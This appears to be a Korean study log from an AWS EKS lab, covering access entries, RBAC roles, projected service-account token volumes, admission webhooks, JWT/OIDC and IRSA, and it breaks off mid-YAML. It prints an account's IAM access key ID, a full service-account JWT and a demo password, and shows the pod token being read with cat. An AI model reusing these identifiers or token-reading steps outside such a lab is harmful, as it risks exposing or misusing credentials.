"accessEntry": {
"clusterName": "myeks2",
"principalArn": "arn:aws:iam::236747833953:user/testuser",
"kubernetesGroups": [],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:236747833953:access-entry/myeks2/user/236747833953/testuser/56c7696d-9b7b-6128-2887-ad677a81b0cc",
"createdAt": "2024-04-13T00:09:25.714000+09:00",
"modifiedAt": "2024-04-13T00:09:25.714000+09:00",
"tags": {},
"username": "arn:aws:iam::236747833953:user/testuser",
"type": "STANDARD"
}
}
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks list-access-entries --cluster-name $CLUSTER_NAME | jq -r .accessEntries[]
arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
arn:aws:iam::236747833953:user/leeeuijoo
arn:aws:iam::236747833953:user/testuser
# testuser에 AmazonEKSClusterAdminPolicy 연동
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks associate-access-policy --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser \
> --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy --access-scope type=cluster
{
"clusterName": "myeks2",
"principalArn": "arn:aws:iam::236747833953:user/testuser",
"associatedAccessPolicy": {
"policyArn": "arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy",
"accessScope": {
"type": "cluster",
"namespaces": []
},
"associatedAt": "2024-04-13T00:10:04.648000+09:00",
"modifiedAt": "2024-04-13T00:10:04.648000+09:00"
}
}
# associated-access-policy
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks list-associated-access-policies --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser | jq
{
"associatedAccessPolicies": [
{
"policyArn": "arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy",
"accessScope": {
"type": "cluster",
"namespaces": []
},
"associatedAt": "2024-04-13T00:10:04.648000+09:00",
"modifiedAt": "2024-04-13T00:10:04.648000+09:00"
}
],
"clusterName": "myeks2",
"principalArn": "arn:aws:iam::236747833953:user/testuser"
}
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks describe-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser | jq
{
"accessEntry": {
"clusterName": "myeks2",
"principalArn": "arn:aws:iam::236747833953:user/testuser",
"kubernetesGroups": [],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:236747833953:access-entry/myeks2/user/236747833953/testuser/56c7696d-9b7b-6128-2887-ad677a81b0cc",
"createdAt": "2024-04-13T00:09:25.714000+09:00",
"modifiedAt": "2024-04-13T00:09:25.714000+09:00",
"tags": {},
"username": "arn:aws:iam::236747833953:user/testuser",
"type": "STANDARD"
}
}
# testuser 정보 확인
(testuser:default) [root@myeks2-bastion-2 ~]# clear
(testuser:default) [root@myeks2-bastion-2 ~]# aws sts get-caller-identity --query Arn
"arn:aws:iam::236747833953:user/testuser"
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl whoami
arn:aws:iam::236747833953:user/testuser
# kubectl 시도
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl get pod -v6
I0413 00:15:04.242775 2928 loader.go:395] Config loaded from file: /root/.kube/config
I0413 00:15:05.288504 2928 round_trippers.go:553] GET https://D3C1852AD76B4F7ACB305E84C0E3FAD5.sk1.ap-northeast-2.eks.amazonaws.com/api/v1/namespaces/default/pods?limit=500 200 OK in 1024 milliseconds
NAME READY STATUS RESTARTS AGE
awscli-pod-5bdb44b5bd-9b99k 1/1 Running 0 35m
awscli-pod-5bdb44b5bd-g6gdk 1/1 Running 0 35m
$ kubectl api-resources -v5
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl rbac-tool whoami
{Username: "arn:aws:iam::236747833953:user/testuser",
UID: "aws-iam-authenticator:236747833953:AIDATOH2FIJQZQUSI5J7W",
Groups: ["system:authenticated"],
Extra: {accessKeyId: ["AKIATOH2FIJQSSIHIZGL"],
arn: ["arn:aws:iam::236747833953:user/testuser"],
canonicalArn: ["arn:aws:iam::236747833953:user/testuser"],
principalId: ["AIDATOH2FIJQZQUSI5J7W"],
sessionName: [""]}}
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl auth can-i get pods --all-namespaces
yes
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl auth can-i delete pods --all-namespaces
yes
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl get cm -n kube-system aws-auth -o yaml | kubectl neat | yh
apiVersion: v1
data:
mapRoles: |
- groups:
- system:bootstrappers
- system:nodes
rolearn: arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
username: system:node:{{EC2PrivateDNSName}}
mapUsers: |
[]
kind: ConfigMap
metadata:
name: aws-auth
namespace: kube-system
(testuser:default) [root@myeks2-bastion-2 ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes
# 기존 testuser access entry 제거
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks delete-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks list-access-entries --cluster-name $CLUSTER_NAME | jq -r .accessEntries[]
arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
arn:aws:iam::236747833953:user/leeeuijoo
# Cluster Role 생성
cat <<EoF> ~/pod-viewer-role.yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: pod-viewer-role
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["list", "get", "watch"]
EoF
cat <<EoF> ~/pod-admin-role.yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: pod-admin-role
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["*"]
EoF
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl apply -f ~/pod-viewer-role.yaml
clusterrole.rbac.authorization.k8s.io/pod-viewer-role created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl apply -f ~/pod-admin-role.yaml
clusterrole.rbac.authorization.k8s.io/pod-admin-role created
# Rolebinding
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create clusterrolebinding viewer-role-binding --clusterrole=pod-viewer-role --group=pod-viewer
clusterrolebinding.rbac.authorization.k8s.io/viewer-role-binding created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create clusterrolebinding admin-role-binding --clusterrole=pod-admin-role --group=pod-admin
clusterrolebinding.rbac.authorization.k8s.io/admin-role-binding created
# 앤트리 생성
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks create-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser --kubernetes-group pod-viewer
{
"accessEntry": {
"clusterName": "myeks2",
"principalArn": "arn:aws:iam::236747833953:user/testuser",
"kubernetesGroups": [
"pod-viewer"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:236747833953:access-entry/myeks2/user/236747833953/testuser/cec76973-bcae-97f3-ed33-ca89066280ce",
"createdAt": "2024-04-13T00:22:49.157000+09:00",
"modifiedAt": "2024-04-13T00:22:49.157000+09:00",
"tags": {},
"username": "arn:aws:iam::236747833953:user/testuser",
"type": "STANDARD"
}
}
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks list-associated-access-policies --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser
{
"associatedAccessPolicies": [],
"clusterName": "myeks2",
"principalArn": "arn:aws:iam::236747833953:user/testuser"
}
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks describe-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser | jq
{
"accessEntry": {
"clusterName": "myeks2",
"principalArn": "arn:aws:iam::236747833953:user/testuser",
"kubernetesGroups": [
"pod-viewer"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:236747833953:access-entry/myeks2/user/236747833953/testuser/cec76973-bcae-97f3-ed33-ca89066280ce",
"createdAt": "2024-04-13T00:22:49.157000+09:00",
"modifiedAt": "2024-04-13T00:22:49.157000+09:00",
"tags": {},
"username": "arn:aws:iam::236747833953:user/testuser",
"type": "STANDARD"
}
}
# testuser 정보 확인
(testuser:default) [root@myeks2-bastion-2 ~]# aws sts get-caller-identity --query Arn
"arn:aws:iam::236747833953:user/testuser"
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl whoami
arn:aws:iam::236747833953:user/testuser
# kubectl 시도
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl get pod -v6
I0413 00:25:55.944784 3495 loader.go:395] Config loaded from file: /root/.kube/config
I0413 00:25:57.126403 3495 round_trippers.go:553] GET https://D3C1852AD76B4F7ACB305E84C0E3FAD5.sk1.ap-northeast-2.eks.amazonaws.com/api/v1/namespaces/default/pods?limit=500 200 OK in 1159 milliseconds
NAME READY STATUS RESTARTS AGE
awscli-pod-5bdb44b5bd-9b99k 1/1 Running 0 46m
awscli-pod-5bdb44b5bd-g6gdk 1/1 Running 0 46m
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl auth can-i get pods --all-namespaces
yes
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl auth can-i delete pods --all-namespaces
no # delete 는 Action 에 넣어주지 않았기 때문
--------이 부분 ------------
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["list", "get", "watch"]
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks update-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser --kubernetes-group pod-admin | jq -r .accessEntry
{
"clusterName": "myeks2",
"principalArn": "arn:aws:iam::236747833953:user/testuser",
"kubernetesGroups": [
"pod-admin"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:236747833953:access-entry/myeks2/user/236747833953/testuser/cec76973-bcae-97f3-ed33-ca89066280ce",
"createdAt": "2024-04-13T00:22:49.157000+09:00",
"modifiedAt": "2024-04-13T00:28:00.909000+09:00",
"tags": {},
"username": "arn:aws:iam::236747833953:user/testuser",
"type": "STANDARD"
}
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks describe-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser | jq
{
"accessEntry": {
"clusterName": "myeks2",
"principalArn": "arn:aws:iam::236747833953:user/testuser",
"kubernetesGroups": [
"pod-admin"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:236747833953:access-entry/myeks2/user/236747833953/testuser/cec76973-bcae-97f3-ed33-ca89066280ce",
"createdAt": "2024-04-13T00:22:49.157000+09:00",
"modifiedAt": "2024-04-13T00:28:00.909000+09:00",
"tags": {},
"username": "arn:aws:iam::236747833953:user/testuser",
"type": "STANDARD"
}
}
# testuser delete pod 가능 한지 확인
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl auth can-i delete pods --all-namespaces
yes
# 설정 예시 1 : eksctl 사용 시
eksctl create cluster --name $CLUSTER_NAME ... --external-dns-access --full-ecr-access --asg-access
# 설정 예시 2 : eksctl로 yaml 파일로 노드 생성 시
cat myeks.yaml | yh
...
managedNodeGroups:
- amiFamily: AmazonLinux2
iam:
withAddonPolicies:
albIngress: false
appMesh: false
appMeshPreview: false
autoScaler: true
awsLoadBalancerController: false
certManager: true
cloudWatch: true
ebs: false
efs: false
externalDNS: true
fsx: false
imageBuilder: true
xRay: false
...
필요 지식 : Service Account Token Volume Projection, Admission Control, JWT(JSON Web Token), OIDC
Service Account Token Volume Projection
기능을 사용하면 이러한 부족한 점들을 해결할 수 있습니다.apiVersion: v1
kind: Pod
metadata:
name: nginx
spec:
containers:
- image: nginx
name: nginx
volumeMounts:
- mountPath: /var/run/secrets/tokens
name: vault-token
serviceAccountName: build-robot
volumes:
- name: vault-token
projected:
sources:
- serviceAccountToken:
path: vault-token
expirationSeconds: 7200
audience: vault
Bound Service Account Token Volume 바인딩된 서비스 어카운트 토큰 볼륨
Kubernetes v1.22 [stable]
- name: kube-api-access-<random-suffix>
projected:
defaultMode: 420 # 420은 rw- 로 소유자는 읽고쓰기 권한과 그룹내 사용자는 읽기만, 보통 0644는 소유자는 읽고쓰고실행 권한과 나머지는 읽고쓰기 권한
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
apiVersion: v1
fieldPath: metadata.namespace
path: namespace
프로젝티드 볼륨은 세 가지로 구성
kube-apiserver
로부터 TokenRequest API를 통해 얻은 서비스어카운트토큰(ServiceAccountToken)
. 서비스어카운트토큰은 기본적으로 1시간 뒤에, 또는 파드가 삭제될 때 만료된다. 서비스어카운트토큰은 파드에 연결되며 kube-apiserver를 위해 존재한다.컨피그맵(ConfigMap)
.DownwardA
Configure a Pod to Use a Projected Volume for Storage : 시크릿 컨피그맵 downwardAPI serviceAccountToken의 볼륨 마운트를 하나의 디렉터리에 통합
apiVersion: v1
kind: Pod
metadata:
name: test-projected-volume
spec:
containers:
- name: test-projected-volume
image: busybox:1.28
args:
- sleep
- "86400"
volumeMounts:
- name: all-in-one
mountPath: "/projected-volume"
readOnly: true
volumes:
- name: all-in-one
projected:
sources:
- secret:
name: user
- secret:
name: pass
# 시크릿 생성
## Create files containing the username and password:
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# echo -n "admin" > ./username.txt
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# echo -n "1f2d1e2e67df" > ./password.txt
## Package these files into secrets:
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create secret generic user --from-file=./username.txt
secret/user created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create secret generic pass --from-file=./password.txt
secret/pass created
# 파드 생성
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl apply -f https://k8s.io/examples/pods/storage/projected.yaml
pod/test-projected-volume created
# 파드 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod test-projected-volume -o yaml | ...
volumes:
- name: all-in-one
projected:
sources:
- secret:
name: user
- secret:
name: pass
- name: kube-api-access-z7xpl
projected:
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
fieldPath: metadata.namespace
path: namespace
# 시크릿 확인
## 묶여 있는 것읗 확인할 수 있습니다.
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it test-projected-volume -- ls /projected-volume/
password.txt username.txt
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it test-projected-volume -- cat /projected-volume/username.txt ;echo
admin
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it test-projected-volume -- cat /projected-volume/password.txt ;echo
1f2d1e2e67df
# 리소스 삭제
kubectl delete pod test-projected-volume && kubectl delete secret user pass
k8s api 접근 단계
Admission Control도 Webhook으로 사용자에게 API가 열려있고, 사용자는 자신만의 Admission Controller를 구현할 수 있으며,
이를 Dynamic Admission Controller라고 부르고, 크게 MutatingWebhook 과 ValidatingWebhook 로 나뉩니다.
MutatingWebhook
은 사용자가 요청한 request에 대해서 관리자가 임의로 값을 변경하는 작업입니다.
ValidatingWebhook
은 사용자가 요청한 request에 대해서 관리자기 허용을 막는 작업입니다.
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get validatingwebhookconfigurations
NAME WEBHOOKS AGE
aws-load-balancer-webhook 3 3h31m
eks-aws-auth-configmap-validation-webhook 1 3h51m
kube-prometheus-stack-admission 1 3h28m
vpc-resource-validating-webhook 2 3h51m
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get mutatingwebhookconfigurations
NAME WEBHOOKS AGE
aws-load-balancer-webhook 3 3h31m
kube-prometheus-stack-admission 1 3h28m
pod-identity-webhook 1 3h51m
vpc-resource-mutating-webhook 1 3h51m
JWT
: Bearer type - JWT(JSON Web Token) X.509 Certificate의 lightweight JSON 버전
.
으로 합쳐지게 됩니다.OIDC
: 사용자를 인증해 사용자에게 액세스 권한을 부여할 수 있게 해주는 프로토콜 ⇒ [커피고래]님 블로그 OpenID Connect - 링크
iss
: 토큰 발행자sub
: 사용자를 구분하기 위한 유니크한 구분자email
: 사용자의 이메일iat
: 토큰이 발행되는 시간을 Unix time으로 표기한 것exp
: 토큰이 만료되는 시간을 Unix time으로 표기한 것aud
: ID Token이 어떤 Client를 위해 발급된 것인지.IRSA 소개
IRSA 소개 : 파드가 특정 IAM 역할로 Assume 할때 토큰을 AWS에 전송하고, AWS는 토큰과 EKS IdP를 통해 해당 IAM 역할을 사용할 수 있는지 검증
동작
실습
# 파드1 생성
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: eks-iam-test1
spec:
containers:
- name: my-aws-cli
image: amazon/aws-cli:latest
args: ['s3', 'ls']
restartPolicy: Never
automountServiceAccountToken: false # Token 만들지 않습니다.
terminationGracePeriodSeconds: 0
EOF
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod
NAME READY STATUS RESTARTS AGE
awscli-pod-5bdb44b5bd-9b99k 1/1 Running 0 73m
awscli-pod-5bdb44b5bd-g6gdk 1/1 Running 0 73m
eks-iam-test1 0/1 Error 0 16s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl logs eks-iam-test1
# s3 ls 권한이 없음
An error occurred (AccessDenied) when calling the ListBuckets operation: Access Denied
# 파드1 삭제
kubectl delete pod eks-iam-test1
# 파드2 생성
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: eks-iam-test2
spec:
containers:
- name: my-aws-cli
image: amazon/aws-cli:latest
command: ['sleep', '36000']
restartPolicy: Never
terminationGracePeriodSeconds: 0
EOF
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k get pods
NAME READY STATUS RESTARTS AGE
awscli-pod-5bdb44b5bd-9b99k 1/1 Running 0 83m
awscli-pod-5bdb44b5bd-g6gdk 1/1 Running 0 83m
eks-iam-test2 1/1 Running 0 49s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod eks-iam-test2 -o yaml | kubectl neat | yh
apiVersion: v1
kind: Pod
metadata:
name: eks-iam-test2
namespace: default
spec:
containers:
- command:
- sleep
- "36000"
image: amazon/aws-cli:latest
name: my-aws-cli
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-vr7sm
readOnly: true
preemptionPolicy: PreemptLowerPriority
priority: 0
restartPolicy: Never
serviceAccountName: default
terminationGracePeriodSeconds: 0
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
- name: kube-api-access-vr7sm
projected:
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
fieldPath: metadata.namespace
path: namespace
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it eks-iam-test2 -- ls /var/run/secrets/kubernetes.io/serviceaccount
ca.crt namespace token
# aws 서비스 사용 시도
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it eks-iam-test2 -- aws s3 ls
An error occurred (AccessDenied) when calling the ListBuckets operation: Access Denied
command terminated with exit code 254
# 서비스 어카운트 토큰 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# SA_TOKEN=$(kubectl exec -it eks-iam-test2 -- cat /var/run/secrets/kubernetes.io/serviceaccount/token)
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# echo $SA_TOKEN
eyJhbGciOiJSUzI1NiIsImtpZCI6ImRiNmQ0MTNmZTdiM2JiMmRmNWE3ZWFmOGUyNTI2ZjNlNzJmODhkN2EifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIl0sImV4cCI6MTc0NDQ3MzczMiwiaWF0IjoxNzEyOTM3NzMyLCJpc3MiOiJodHRwczovL29pZGMuZWtzLmFwLW5vcnRoZWFzdC0yLmFtYXpvbmF3cy5jb20vaWQvRDNDMTg1MkFENzZCNEY3QUNCMzA1RTg0QzBFM0ZBRDUiLCJrdWJlcm5ldGVzLmlvIjp7Im5hbWVzcGFjZSI6ImRlZmF1bHQiLCJwb2QiOnsibmFtZSI6ImVrcy1pYW0tdGVzdDIiLCJ1aWQiOiJjN2IxMjM2Zi03ZWJhLTRjYjYtODE3Mi03ZmQyNTFlZWEwZjUifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImRlZmF1bHQiLCJ1aWQiOiI5NTczODg4NC1iYTlhLTQ3MGMtOTE0Zi1lMDE3ZWZhYTU1MjQifSwid2FybmFmdGVyIjoxNzEyOTQxMzM5fSwibmJmIjoxNzEyOTM3NzMyLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6ZGVmYXVsdDpkZWZhdWx0In0.q6XA13a-KlRbPyc-BN1-_phfx1i8X_aL0OWW98-QWw2Stwhqo_rQxt7MyaZ43YBanMYeu_i__ejogOsdvYu5bG66vVweFODYC1153WJ-YUJQP-D8g0ggNoprSw7tQVjGWf--NZpL1kNX_S2-ZCVUx40ENpOZZZKaO1BjPY5qT3ydN-PjQkX_bQ1IF-Vh2x8EN8lpoSGF_kI9Dy1k5avYx63l-ZTjOol2z95r8AQ2el6DNs-YSFkFACOoKJ7fIq3R0oPriryIo0clG_qkzha6xGxyw25hChMIRE7miPFKBmGrPZ6IuW-pqEVE835cRALjW9e77tWXYvbzCnQZkFpPSA
# jwt 혹은 아래 JWT 웹 사이트 이용 https://jwt.io/
# 헤더
{
"alg": "RS256",
"kid": "db6d413fe7b3bb2df5a7eaf8e2526f3e72f88d7a"
}
# 페이로드 : OAuth2에서 쓰이는 aud, exp 속성 확인! > projectedServiceAccountToken 기능으로 토큰에 audience,exp 항목을 덧붙힘
## iss 속성 : EKS OpenID Connect Provider(EKS IdP) 주소 > 이 EKS IdP를 통해 쿠버네티스가 발급한 토큰이 유요한지 검증
{
"aud": [
"https://kubernetes.default.svc" # 해당 주소는 k8s api의 ClusterIP 서비스 주소 도메인명, kubectl get svc kubernetes
],
"exp": 1744473732,
"iat": 1712937732,
"iss": "https://oidc.eks.ap-northeast-2.amazonaws.com/id/D3C1852AD76B4F7ACB305E84C0E3FAD5",
"kubernetes.io": {
"namespace": "default",
"pod": {
"name": "eks-iam-test2",
"uid": "c7b1236f-7eba-4cb6-8172-7fd251eea0f5"
},
"serviceaccount": {
"name": "default",
"uid": "95738884-ba9a-470c-914f-e017efaa5524"
},
"warnafter": 1712941339
},
"nbf": 1712937732,
"sub": "system:serviceaccount:default:default"
}
# 파드2 삭제
kubectl delete pod eks-iam-test2
실습 3 OIDC
# Create an iamserviceaccount - AWS IAM role bound to a Kubernetes service account
eksctl create iamserviceaccount \
--name my-sa \
--namespace default \
--cluster $CLUSTER_NAME \
--approve \
--attach-policy-arn $(aws iam list-policies --query 'Policies[?PolicyName==`AmazonS3ReadOnlyAccess`].Arn' --output text)
# 확인 >> 웹 관리 콘솔에서 CloudFormation Stack >> IAM Role 확인
# aws-load-balancer-controller IRSA는 어떤 동작을 수행할 것 인지 생각해보자!
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl get iamserviceaccount --cluster $CLUSTER_NAME
NAMESPACE NAME ROLE ARN
default my-sa arn:aws:iam::236747833953:role/eksctl-myeks2-addon-iamserviceaccount-default-Role1-7y447UXCxl1Z
kube-system aws-load-balancer-controller arn:aws:iam::236747833953:role/eksctl-myeks2-addon-iamserviceaccount-kube-sy-Role1-eRtMjg6MGlN1
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get sa
NAME SECRETS AGE
default 0 4h20m
my-sa 0 69s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl describe sa my-sa
Name: my-sa
Namespace: default
Labels: app.kubernetes.io/managed-by=eksctl
Annotations: eks.amazonaws.com/role-arn: arn:aws:iam::236747833953:role/eksctl-myeks2-addon-iamserviceaccount-default-Role1-7y447UXCxl1Z
Image pull secrets: <none>
Mountable secrets: <none>
Tokens: <none>
Events: <none>
# Pod 3 생성
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: eks-iam-test3
spec:
serviceAccountName: my-sa
containers:
- name: my-aws-cli
image: amazon/aws-cli:latest
command: ['sleep', '36000']
restartPolicy: Never
terminationGracePeriodSeconds: 0
EOF
# 해당 SA를 파드가 사용 시 mutatingwebhook으로 Env,Volume 추가함
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get mutatingwebhookconfigurations pod-identity-webhook -o yaml | kubectl neat | yh
apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
name: pod-identity-webhook
webhooks:
- admissionReviewVersions:
- v1beta1
clientConfig:
caBundle: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURCVENDQWUyZ0F3SUJBZ0lJYlh5NHdmMWZhb0l3RFFZSktvWklodmNOQVFFTEJRQXdGVEVUTUJFR0ExVUUKQXhNS2EzVmlaWEp1WlhSbGN6QWVGdzB5TkRBME1USXhNVFE1TURKYUZ3MHpOREEwTVRBeE1UVTBNREphTUJVeApFekFSQmdOVkJBTVRDbXQxWW1WeWJtVjBaWE13Z2dFaU1BMEdDU3FHU0liM0RRRUJBUVVBQTRJQkR3QXdnZ0VLCkFvSUJBUURrQ24yZzdRWGZBOGtKOU83U3N6Mnd5aiswbUMrUWdFOEdBMkNSSStwTEYvbHErNEhiblNzbWhJYk4KTElPcmlUNTIrRVhaRWZmSWZSQUNxWG5wL1ZhS3o5U2xMdGpqcGhhblp2L2RMTkhnZEE1eWVzWnNEZFo0c2xuYQpjWjNremhNS2VCZVJXREkvL2ZVVGtaWldYYzNJUnhrVkhZaFN1QVNwRzk4ZjRVRWRGY1E5Sno0czB2czRyRnIvCmI3a0xzYW9rUHo2R1p3MFFkdFBRQUdrZitmc0VETHFvZG9HckYzZ2FUVHM5VXVnOUtxMmZxNXp5THNmSGZVQy8KemZvUkVwRmxsSGJyR2FpQUZvZUthTlhtTjN5YUd1UnI3ZndJSDlud1B4UjJOZWxYdWkyNWx6amlwNGozTVJBWQpnU2JvY1V4VkNMUkE1cnFzcGl5RCsvTllEdk9wQWdNQkFBR2pXVEJYTUE0R0ExVWREd0VCL3dRRUF3SUNwREFQCkJnTlZIUk1CQWY4RUJUQURBUUgvTUIwR0ExVWREZ1FXQkJUUFYvY3V6ODdMOTgzZ2wwYTNpTS9XM2pTQTFEQVYKQmdOVkhSRUVEakFNZ2dwcmRXSmxjbTVsZEdWek1BMEdDU3FHU0liM0RRRUJDd1VBQTRJQkFRQWg2N0xTNFBwdgpZdEZoendqTzEzK3BQZzQrZHVIM3ROL3ozOVh5YUhhTXRkL0hHazNBRXErSnRvcnVqbWNQUWtZTU5OdVkwK0xsCjJQZXdrTmUwUSs4QXN3a1RTUnpNUGltcWx6RktHNk9NbUFkbVBkUVNrZ2MvVEVCRjl4ZkJBdmltaG1OQUlJVWcKb2FrL1grc2pPYmpmQS9yUndKVnBNQUwvTjRNclAvTkJsRytxYjcraFpaRVMzVnJERGRuSElIcWtRcHBwMTJMcwpnUHlzQ2JnSldCZEZIcW91MUdlTWE3QmFmN2huZWJrUDg2SlhaemZEUW4ydHlTZXZoNnAxMnpIeDZwTm1BVjMvClpxZUE1TG5SM0tsbXF0TkF1M3NKblkvUEpSbzNXU05lcDJ0RWJRVTBDVVlLQmIwMjhhQzJ3OVp5bFVQK0gvelIKNFJxOTFXdjdxRjBsCi0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
url: https://127.0.0.1:23443/mutate
failurePolicy: Ignore
matchPolicy: Equivalent
name: iam-for-pods.amazonaws.com
reinvocationPolicy: IfNeeded
rules:
- apiGroups:
- ""
apiVersions:
- v1
operations:
- CREATE
resources:
- pods
scope: '*'
sideEffects: None
timeoutSeconds: 10
# 파드 생성 yaml에 없던 내용이 추가됨!!!!!
# Pod Identity Webhook은 mutating webhook을 통해 아래 Env 내용과 1개의 볼륨을 추가함
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod eks-iam-test3
NAME READY STATUS RESTARTS AGE
eks-iam-test3 1/1 Running 0 2m8s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod eks-iam-test3 -o yaml | kubectl neat | yh
apiVersion: v1
kind: Pod
metadata:
name: eks-iam-test3
namespace: default
spec:
containers:
- command:
- sleep
- "36000"
env:
- name: AWS_STS_REGIONAL_ENDPOINTS
value: regional
- name: AWS_DEFAULT_REGION
value: ap-northeast-2
- name: AWS_REGION
value: ap-northeast-2
- name: AWS_ROLE_ARN
